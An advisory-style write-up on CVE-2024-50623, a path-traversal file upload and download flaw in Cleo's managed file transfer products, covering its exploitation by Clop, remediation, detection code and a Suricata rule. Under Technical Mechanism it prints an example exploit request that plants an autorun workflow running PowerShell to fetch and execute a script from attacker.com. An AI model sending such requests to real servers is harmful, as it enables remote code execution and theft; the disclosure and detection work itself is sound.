CVE-2024-50623 High Patch Available

CVE-2024-50623: Cleo Harmony/VLTrader — Unrestricted File Upload and Download RCE

CVE Details

CVE ID: CVE-2024-50623
CVSS Score: 8.8
Severity: High
Vendor: Cleo
Product: Harmony / VLTrader / LexiCom
Patch Status: Available
Published: April 15, 2026

Background

Cleo’s Harmony, VLTrader, and LexiCom are managed file transfer (MFT) solutions serving the supply chain, logistics, and retail sectors. These products handle B2B data exchange including EDI (Electronic Data Interchange) documents, purchase orders, shipment records, and financial transactions.

CVE-2024-50623 was the initial vulnerability in the Cleo product line disclosed by security researchers in October 2024. While rated CVSS 8.8 (High), its significance extends beyond its individual score: it established the initial attack foothold in Cleo installations that threat actors then deepened with the more severe CVE-2024-55956 in December 2024. The two vulnerabilities are closely related and were used sequentially by the Clop ransomware group in their coordinated Cleo exploitation campaign.

Technical Mechanism

CVE-2024-50623 is an unrestricted file upload and download vulnerability in Cleo’s web-accessible interface. The vulnerability permits:

  1. Unrestricted file upload: Files can be uploaded to the server via HTTP without proper path validation or content type restrictions
  2. Unrestricted file download: Files can be downloaded from the server without adequate authentication or path restriction

The file upload component lacks validation of:

  • The upload path (path traversal allows writing outside intended directories)
  • File content type (any file type including executable scripts can be uploaded)
  • Authentication for certain upload endpoints

The path traversal aspect allows writing uploaded files to locations within the Cleo installation that will be executed by the application, rather than merely stored as data:

# Uploading a malicious file to an executable location via path traversal
POST /Cleo/Harmony/files/../autorun/malicious.xml HTTP/1.1
Host: cleo.target.com
Content-Type: text/xml

<workflow>
  <step>
    <action>RunCommand</action>
    <command>powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/stage2.ps1')"</command>
  </step>
</workflow>

The autorun directory (also central to CVE-2024-55956) is monitored by the Cleo application and files placed there are processed and executed. This makes it an ideal target for code execution via file upload.

The download component vulnerability allows reading arbitrary files from the server filesystem, enabling information gathering (credentials, configuration) as a precursor to further exploitation.
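As an added illustration (not code from the advisory or from Cleo), the following Python contrasts a naive path join, which honours the ".." segments described above and so lets an upload land in the autorun directory, with a hardened handler that percent-decodes (including double encoding), normalises, requires the result to stay under the upload root and enforces a data-file allow-list. The upload root and the allow-list are hypothetical values; the same containment check protects a download handler against the arbitrary-read side of the issue.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Hypothetical upload root and data-file allow-list; neither is a real Cleo setting.
UPLOAD_ROOT = "/opt/cleo/Harmony/files"
ALLOWED_SUFFIXES = {".edi", ".txt", ".csv", ".pdf"}


def decode_fully(segment: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    '..%2F' and the double-encoded '%252e%252e%2F' both end up as '../'."""
    for _ in range(rounds):
        decoded = unquote(segment)
        if decoded == segment:
            break
        segment = decoded
    return segment


def unsafe_upload_path(requested: str) -> str:
    """The behaviour the advisory describes: the client-supplied name is joined
    to the upload root and '..' segments are honoured, so the file can land in
    any directory the application can write to, including autorun."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, decode_fully(requested)))


def safe_upload_path(requested: str) -> Optional[str]:
    """Hardened version: returns the destination path, or None if the request
    must be rejected.  The same containment check protects a download handler."""
    name = decode_fully(requested)
    # Reject NUL bytes, absolute paths and backslashes before any joining
    if "\x00" in name or name.startswith("/") or "\\" in name:
        return None
    candidate = posixpath.normpath(posixpath.join(UPLOAD_ROOT, name))
    # Containment: the normalised result must stay strictly under the root
    if not candidate.startswith(UPLOAD_ROOT + "/"):
        return None
    # Content restriction: plain data files only, never workflow XML or scripts
    if posixpath.splitext(candidate)[1].lower() not in ALLOWED_SUFFIXES:
        return None
    return candidate


if __name__ == "__main__":
    for req in ("orders/po-1001.edi", "../autorun/malicious.xml",
                "..%2Fautorun%2Fmalicious.xml", "%252e%252e/autorun/run.edi"):
        print(f"{req!r:40} unsafe -> {unsafe_upload_path(req)}")
        print(f"{'':40} safe   -> {safe_upload_path(req)}")
```

The containment test is done on the normalised string rather than by looking for ".." in the input, so encoded, doubled and mixed-separator variants are all caught by one rule; the suffix allow-list is what stops a workflow XML from being written even inside the intended directory.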

Real-World Exploitation Evidence

CVE-2024-50623 was initially documented by security researchers and Cleo’s own advisory team in October-November 2024. Key observations:

  • Researcher disclosure: Security researchers identified and reported the vulnerability to Cleo, leading to the October 2024 advisory.
  • Patch bypass: Cleo released a patch for CVE-2024-50623, but Clop (or an affiliated researcher) identified that the patch was incomplete — the core file upload issue was addressed but the autorun directory remained accessible via a slightly different path. This bypass became the basis for CVE-2024-55956.
  • Staged exploitation: Post-incident analysis of Clop’s December 2024 campaign showed some victims were first accessed via CVE-2024-50623 before CVE-2024-55956 was used.
  • Data theft staging: CVE-2024-50623’s download capability was used to exfiltrate configuration files and credentials as reconnaissance for deeper access.

Impact Assessment

CVE-2024-50623 provides:

  • Arbitrary file write: Upload files to any location on the Cleo server accessible to the application process, enabling code execution when targeting executable directories.
  • Arbitrary file read: Access any file on the server readable by the Cleo process — including configuration files with passwords, certificates, and trading partner credentials.
  • Authentication context: High-privilege code execution in the Cleo application’s context, which has access to all transfer data and connected systems.
  • Chaining to deeper access: The download capability enables credential harvesting that facilitates fully authenticated attacks on the Cleo API and connected systems.

Affected Versions

Product       | Affected Versions  | Fixed Version
Cleo Harmony  | 5.8.0.20 and prior | 5.8.0.21+ (CVE-2024-50623 fix); 5.8.0.24+ (full fix including CVE-2024-55956)
Cleo VLTrader | 5.8.0.20 and prior | 5.8.0.21+ / 5.8.0.24+
Cleo LexiCom  | 5.8.0.20 and prior | 5.8.0.21+ / 5.8.0.24+

Important: The 5.8.0.21 patch for CVE-2024-50623 was found to be bypassable by the technique used in CVE-2024-55956. Full remediation requires version 5.8.0.24+.

Remediation Steps

  1. Upgrade to 5.8.0.24 or later: This version addresses both CVE-2024-50623 and CVE-2024-55956. The 5.8.0.21 patch is insufficient.

  2. Check for evidence of exploitation:

    # Check autorun directory for unexpected files
    Get-ChildItem "C:\Cleo\Harmony\autorun\" -Recurse | 
      Where-Object {$_.CreationTime -gt (Get-Date).AddDays(-30)}
    
    # Check for unexpected XML workflow files
    Get-ChildItem "C:\Cleo\Harmony\" -Filter "*.xml" -Recurse | 
      Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-30)}

  3. Review file transfer logs: Check Cleo’s transaction logs for unusual download activity, particularly bulk downloads of configuration files.

  4. Restrict web interface access: Limit access to the Cleo web interface to known internal management networks.

  5. Rotate trading partner credentials: If exploitation occurred, treat all credentials in Cleo’s configuration as compromised.

  6. Disable autorun if not needed: The autorun feature is a high-risk component; disable it if the workflow automation capability is not in use.

Detection Guidance

Log sources:

  • Cleo Harmony transaction log: <install>\Harmony\logs\
  • Cleo Harmony system log: <install>\Harmony\logs\harmony.log
  • Windows Event Logs for process creation events

Suspicious patterns in Cleo logs:

  • File upload requests with ../ or ..%2F in path parameters
  • Download requests for configuration files (.properties, .xml in config directories)
  • Process creation events showing cmd.exe or powershell.exe spawned from the Cleo Java process
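The following Python is an added example, not part of the advisory or of any Cleo tooling, that applies the first two patterns above, and the bulk configuration download check from the remediation steps, to constructed access-log lines. The log format is a generic combined-log style, not real Cleo output, and the config/ directory name is illustrative; only the /Cleo/Harmony/ path prefix and the autorun directory come from the advisory.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample lines in a generic access-log style.  They are not real
# Cleo log output; the config/ directory is hypothetical, only /Cleo/Harmony/
# and autorun come from the advisory.
SAMPLE_LOG = """\
203.0.113.9 - - [09/Dec/2024:03:14:07 +0000] "GET /Cleo/Harmony/config/system.properties HTTP/1.1" 200 2210
203.0.113.9 - - [09/Dec/2024:03:14:09 +0000] "GET /Cleo/Harmony/config/options.xml HTTP/1.1" 200 8831
203.0.113.9 - - [09/Dec/2024:03:15:30 +0000] "POST /Cleo/Harmony/files/../autorun/update.xml HTTP/1.1" 200 512
203.0.113.9 - - [09/Dec/2024:03:15:31 +0000] "POST /Cleo/Harmony/files/..%2F..%2Fautorun%2Fupdate.xml HTTP/1.1" 200 512
192.168.1.20 - - [09/Dec/2024:03:20:00 +0000] "PUT /Cleo/Harmony/files/orders/po-1001.edi HTTP/1.1" 201 3300
192.168.1.21 - - [09/Dec/2024:03:21:00 +0000] "GET /Cleo/Harmony/files/reports/daily.pdf HTTP/1.1" 200 77012
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+$'
)
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
# Hypothetical config directory names; adjust to the real install layout
CONFIG_RE = re.compile(r"/(config|conf)/[^/]*\.(properties|xml)$", re.IGNORECASE)
UPLOAD_METHODS = {"POST", "PUT"}


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable, so ..%2F and %252e%252e%2F are both seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None when nothing looks suspicious."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw_path = m["path"].split("?", 1)[0]
    path = decode_fully(raw_path).replace("\\", "/")
    findings: List[str] = []
    # Pattern 1: traversal sequence in an upload request (raw or percent-encoded)
    if m["method"] in UPLOAD_METHODS and TRAVERSAL_RE.search(path):
        findings.append("traversal-upload")
    # Pattern 2: download of a .properties / .xml file from a config directory
    if m["method"] == "GET" and CONFIG_RE.search(path):
        findings.append("config-download")
    if not findings:
        return None
    return {"src": m["src"], "ts": m["ts"], "method": m["method"],
            "path": raw_path, "findings": findings}


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run classify() over every line and keep the hits."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


def bulk_config_downloaders(results: List[Dict[str, object]], threshold: int = 2) -> List[str]:
    """Sources that pulled at least `threshold` config files: the bulk-download
    pattern the remediation steps say to look for in the transaction logs."""
    counts = Counter(r["src"] for r in results if "config-download" in r["findings"])
    return sorted(src for src, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h["src"], h["method"], h["path"], ",".join(h["findings"]))
    print("bulk config downloads from:", bulk_config_downloaders(hits))
```

Matching runs on the decoded path so that the ..%2F form listed above and its double-encoded variant are treated the same as a literal ../; the threshold for the bulk-download check is a tuning knob and should be set from a baseline of normal administrative traffic.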

Windows Event Log (PowerShell):

# Check for cmd.exe / powershell.exe spawned by Cleo's JVM (Event ID 4688;
# requires process creation auditing to be enabled on the host)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | ForEach-Object {
  $d = @{}; ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
  if ($d.ParentProcessName -match 'java\.exe$' -and $d.NewProcessName -match '(cmd|powershell)\.exe$') { $_ }
}

Suricata signature:

# http.uri is Suricata's normalised URI, in which "../" has already been collapsed;
# the raw buffer is needed to see the traversal sequence as it was sent
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Cleo MFT CVE-2024-50623 Path Traversal File Upload"; flow:established,to_server; http.method; content:"POST"; http.uri.raw; content:"/Cleo/"; content:"../"; distance:0; classtype:web-application-attack; sid:9002506; rev:2;)

Timeline

Date          | Event
October 2024  | Cleo publishes advisory for CVE-2024-50623
October 2024  | Cleo releases version 5.8.0.21 with partial fix
November 2024 | Security researchers discover patch bypass technique
December 2024 | Clop exploits both CVE-2024-50623 and CVE-2024-55956 in campaign
December 2024 | CISA adds CVE-2024-50623 to KEV catalogue
December 2024 | Cleo releases 5.8.0.24 addressing both vulnerabilities